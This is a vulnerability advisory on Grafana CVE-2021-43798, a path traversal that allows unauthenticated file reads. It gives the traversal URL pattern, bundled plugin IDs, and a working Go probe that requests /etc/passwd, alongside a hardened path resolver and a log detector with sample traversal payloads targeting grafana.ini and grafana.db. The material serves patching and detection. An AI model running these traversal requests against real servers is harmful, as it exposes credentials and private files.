| Field | Value |
| --- | --- |
| Category | Vulnerability Intelligence |
| Vulnerability Class | Path Traversal leading to Unauthenticated Local File Inclusion (arbitrary file read) |
| CVE ID | CVE-2021-43798 |
| CVSS:3.0 Score | 7.5 (High), AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| TLP | GREEN |
| Reference | https://en.wikipedia.org/wiki/Intelligence_source_and_information_reliability, https://en.wikipedia.org/wiki/Traffic_Light_Protocol |
Executive Summary
- Grafana recently released an advisory and patches for a high-severity path traversal vulnerability that allows unauthenticated local file inclusion (arbitrary file read).
- Grafana is a multi-platform, open-source analytics and interactive visualization web application.
- The vulnerability affects Grafana versions v8.0.0-beta1 through v8.3.0 and is fixed in 8.3.1, 8.2.7, 8.1.8 and 8.0.7. Grafana Cloud is not affected.
- Threat actors can exploit the flaw with a single crafted HTTP request to read files the Grafana process can access, such as /etc/passwd, the grafana.ini configuration (which may contain credentials) and the grafana.db SQLite database, leading to sensitive information disclosure.
Analysis
- Grafana is an open-source platform for collecting metrics and data about applications and turning them into dashboards. Those dashboards give insight into user and application behaviour, the frequency and type of errors occurring in production or pre-production environments, and the context around them, by correlating the relevant data.
- Grafana has become a popular choice for analysing and visualising such data. According to Censys, 114,575 Grafana instances were exposed on the internet at the time of writing.
(Figure: search results from Censys)
- To exploit this vulnerability, an attacker only needs to send an unauthenticated GET request for a path under /public/plugins/ that names a plugin present on the target, followed by enough ../ segments to escape the plugin directory. For example, PoC: {host}/public/plugins/{pluginID}/../../../../../../../../etc/passwd
- The ../ segments must reach the server unchanged. Most HTTP clients and browsers collapse dot segments before sending the request, so a raw request is required (for curl, the --path-as-is option).
- Any plugin ID installed on the target works; bundled plugins present on a default installation include:
- alertlist
- annolist
- barchart
- bargauge
- candlestick
- cloudwatch
- dashlist
- elasticsearch
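The following is an added example for this report, not Grafana's code and not any of the public PoC scripts. It builds the request shown above for each bundled plugin ID, keeps the ../ segments raw (Go's net/http sends the path as given, which is the reason for choosing it over a client that normalises paths), and treats the response as positive only when the body actually parses as /etc/passwd. The target URL is an assumption passed on the command line.

```go
// probe.go: unauthenticated check for CVE-2021-43798.
// Added example for this report; not Grafana's code and not a published PoC.
// The target base URL is an assumption taken from the command line.
package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
	"regexp"
	"strings"
	"time"
)

// Bundled plugin IDs present on a default install; any plugin the target
// actually has will do, because the traversal starts after the ID.
var KnownPlugins = []string{
	"alertlist", "annolist", "barchart", "bargauge",
	"candlestick", "cloudwatch", "dashlist", "elasticsearch",
}

// passwdRe is the success oracle: the root entry of an /etc/passwd file.
var passwdRe = regexp.MustCompile(`(?m)^root:[^:]*:0:0:`)

// ProbeURL builds the traversal request. The dot segments stay raw on
// purpose: the server-side path cleaning is what is under test, so the
// client must not collapse them first (curl needs --path-as-is; Go's
// net/http sends the path exactly as given).
func ProbeURL(baseURL, pluginID, target string) string {
	return strings.TrimRight(baseURL, "/") + "/public/plugins/" + pluginID +
		"/" + strings.Repeat("../", 8) + strings.TrimLeft(target, "/")
}

// LooksLikePasswd reports whether a response body is an /etc/passwd file.
func LooksLikePasswd(body []byte) bool {
	return passwdRe.Match(body)
}

// Probe requests /etc/passwd through one plugin ID and reports whether the
// file came back, together with the HTTP status.
func Probe(client *http.Client, baseURL, pluginID string) (bool, int, error) {
	req, err := http.NewRequest(http.MethodGet, ProbeURL(baseURL, pluginID, "/etc/passwd"), nil)
	if err != nil {
		return false, 0, err
	}
	resp, err := client.Do(req)
	if err != nil {
		return false, 0, err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(io.LimitReader(resp.Body, 64<<10)) // cap what we read
	if err != nil {
		return false, resp.StatusCode, err
	}
	return resp.StatusCode == http.StatusOK && LooksLikePasswd(body), resp.StatusCode, nil
}

// NewClient does not follow redirects: a 301/302 means something in front
// of Grafana rewrote the path, which is worth seeing rather than hiding.
func NewClient() *http.Client {
	return &http.Client{
		Timeout: 10 * time.Second,
		CheckRedirect: func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
}

func main() {
	if len(os.Args) != 2 {
		fmt.Fprintln(os.Stderr, "usage: probe http://grafana.example.org:3000")
		os.Exit(2)
	}
	client := NewClient()
	for _, id := range KnownPlugins {
		vuln, status, err := Probe(client, os.Args[1], id)
		if err != nil {
			fmt.Printf("%-14s error: %v\n", id, err)
			continue
		}
		fmt.Printf("%-14s HTTP %d vulnerable=%v\n", id, status, vuln)
		if vuln {
			return // one positive is enough
		}
	}
}
```

A patched instance answers these requests with a 404; a 200 whose body is not /etc/passwd (for example a generic HTML page from a proxy) is deliberately not counted as a positive.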
Information from OSINT
Ever since this vulnerability was made public there has been continuous scanning for vulnerable targets. Because of the ease of exploitation, threat actors have begun exploiting it at scale in the wild, and multiple PoC scripts are available on open-source platforms such as GitHub.

Vulnerability Analysis
The vulnerability arises from a misreading of the documented behaviour of a standard-library function in pkg/api/plugins.go. The plugin asset handler runs the user-controlled remainder of the URL through filepath.Clean and then joins it to the plugin directory with filepath.Join, on the assumption that Clean removes ".." segments. The Go documentation states that Clean only eliminates ".." elements that begin a rooted path; on a relative path the leading ".." segments are preserved, so the join resolves to a location outside the plugin directory and any file readable by the Grafana process is served without authentication.
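The following is an added example for this report that reproduces the Clean-then-Join pattern described above beside a hardened resolver; it is not Grafana's handler verbatim, and the plugin directory used is an assumed install path. The safe version joins first and then checks containment with filepath.Rel, which is the check the vulnerable code was missing.

```go
// resolve.go: the path-resolution mistake behind CVE-2021-43798 next to a
// hardened version. Added example for this report; it reproduces the
// Clean-then-Join pattern, not Grafana's code verbatim. The plugin
// directory used in main is an assumption.
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ResolveVulnerable is the pattern that was relied on: clean the
// user-supplied remainder of the URL, then join it to the plugin directory.
// filepath.Clean only discards leading ".." on a rooted path, so on this
// relative input it leaves "../../.." intact and Join walks out of the dir.
func ResolveVulnerable(pluginDir, requested string) string {
	return filepath.Join(pluginDir, filepath.Clean(requested))
}

var ErrOutsidePluginDir = errors.New("requested file resolves outside the plugin directory")

// ResolveSafe joins first, then proves containment: the path relative to
// pluginDir must not start with "..". Symlinks inside pluginDir are a
// separate concern; resolve them with filepath.EvalSymlinks if plugin
// directories are not trusted.
func ResolveSafe(pluginDir, requested string) (string, error) {
	base := filepath.Clean(pluginDir)
	full := filepath.Join(base, requested) // Join cleans the joined result
	rel, err := filepath.Rel(base, full)
	if err != nil {
		return "", err
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsidePluginDir
	}
	return full, nil
}

func main() {
	dir := "/var/lib/grafana/plugins/alertlist" // assumed install path
	inputs := []string{
		"module.js",
		"../../../../../../../../etc/passwd", // the PoC from this report
		"../dashlist/module.js",
		"/etc/passwd",
	}
	for _, req := range inputs {
		fmt.Printf("%-38q vulnerable -> %s\n", req, ResolveVulnerable(dir, req))
		safe, err := ResolveSafe(dir, req)
		if err != nil {
			fmt.Printf("%-38q safe       -> rejected: %v\n", req, err)
			continue
		}
		fmt.Printf("%-38q safe       -> %s\n", req, safe)
	}
}
```

Note that an absolute request such as /etc/passwd is harmless in both versions, because Join treats it as relative to the plugin directory; only the relative ".." segments escape, which is exactly the case filepath.Clean does not cover.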
Impact & Mitigation

| Impact | Mitigation |
| --- | --- |
| Unauthenticated read of any file accessible to the Grafana process (for example /etc/passwd, grafana.ini with datasource or SMTP credentials, grafana.db with user hashes and API keys), leading to sensitive information disclosure and possible follow-on compromise. | Upgrade to Grafana 8.3.1, 8.2.7, 8.1.8 or 8.0.7 or later. Where an immediate upgrade is not possible, restrict internet exposure of the instance and block requests to /public/plugins/ whose path contains ".." segments (including percent-encoded forms) at the reverse proxy or WAF. Review proxy and Grafana request logs for such requests and rotate any credentials stored in grafana.ini or grafana.db if exploitation is suspected. |
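For the in-the-wild scanning noted under Information from OSINT and the log review suggested in the mitigation, the following is an added example for this report, not a Grafana or vendor detection rule. It assumes an nginx-style combined access log from a reverse proxy in front of Grafana; the log lines embedded in it are constructed samples, not real traffic. It decodes single and double percent-encoding before matching, so %2e%2e and %252e%252e are caught as well as plain "..", and it reports attempts regardless of status code, since a 404 from a patched server still identifies a scanner.

```go
// detect.go: flag CVE-2021-43798 traversal attempts in reverse-proxy access
// logs. Added example for this report, not a Grafana or vendor detection
// rule. Assumes nginx "combined" log format in front of Grafana; SampleLog
// is constructed for the example, not real traffic.
package main

import (
	"bufio"
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

const SampleLog = `198.51.100.7 - - [08/Dec/2021:10:15:01 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1893 "-" "python-requests/2.26.0"
203.0.113.9 - - [08/Dec/2021:10:15:03 +0000] "GET /public/plugins/dashlist/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/lib/grafana/grafana.db HTTP/1.1" 200 5120 "-" "curl/7.68.0"
192.0.2.44 - - [08/Dec/2021:10:15:05 +0000] "GET /public/plugins/barchart/module.js HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
192.0.2.44 - - [08/Dec/2021:10:15:06 +0000] "GET /api/health HTTP/1.1" 200 50 "-" "Mozilla/5.0"
203.0.113.9 - - [08/Dec/2021:10:15:08 +0000] "GET /public/plugins/cloudwatch/%252e%252e/%252e%252e/%252e%252e/etc/grafana/grafana.ini HTTP/1.1" 404 32 "-" "curl/7.68.0"
`

// combinedRe pulls client, timestamp, method, raw request target and status
// out of an nginx/Apache combined-format line.
var combinedRe = regexp.MustCompile(`^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})`)

type Hit struct {
	Client, Time, Method, PluginID, Path, Status string
}

// Normalize strips the query string, undoes up to two rounds of
// percent-encoding so %2e%2e and %252e%252e both become "..", and folds
// backslashes to slashes.
func Normalize(p string) string {
	if i := strings.IndexByte(p, '?'); i >= 0 {
		p = p[:i]
	}
	for i := 0; i < 2; i++ {
		d, err := url.PathUnescape(p)
		if err != nil || d == p {
			break
		}
		p = d
	}
	return strings.ReplaceAll(p, "\\", "/")
}

// TraversalPlugin returns the plugin ID if the request targets
// /public/plugins/<id>/ and contains a ".." segment after the ID.
func TraversalPlugin(rawPath string) (string, bool) {
	const prefix = "/public/plugins/"
	p := Normalize(rawPath)
	if !strings.HasPrefix(p, prefix) {
		return "", false
	}
	rest := strings.TrimPrefix(p, prefix)
	slash := strings.IndexByte(rest, '/')
	if slash < 0 {
		return "", false
	}
	for _, seg := range strings.Split(rest[slash+1:], "/") {
		if seg == ".." {
			return rest[:slash], true
		}
	}
	return "", false
}

// ScanLog returns every traversal attempt, whatever the status code:
// a 404 from a patched server still identifies a scanner.
func ScanLog(log string) []Hit {
	var hits []Hit
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		m := combinedRe.FindStringSubmatch(sc.Text())
		if m == nil {
			continue
		}
		if id, ok := TraversalPlugin(m[4]); ok {
			hits = append(hits, Hit{Client: m[1], Time: m[2], Method: m[3], PluginID: id, Path: m[4], Status: m[5]})
		}
	}
	return hits
}

func main() {
	for _, h := range ScanLog(SampleLog) {
		fmt.Printf("%s %s %s plugin=%s status=%s %s\n", h.Time, h.Client, h.Method, h.PluginID, h.Status, h.Path)
	}
}
```

Legitimate Grafana front-end traffic never contains ".." under /public/plugins/, so the rule has no expected false positives on normal use; the paths it flags also tell you which files an attacker went after, which drives credential rotation if grafana.ini or grafana.db were targeted.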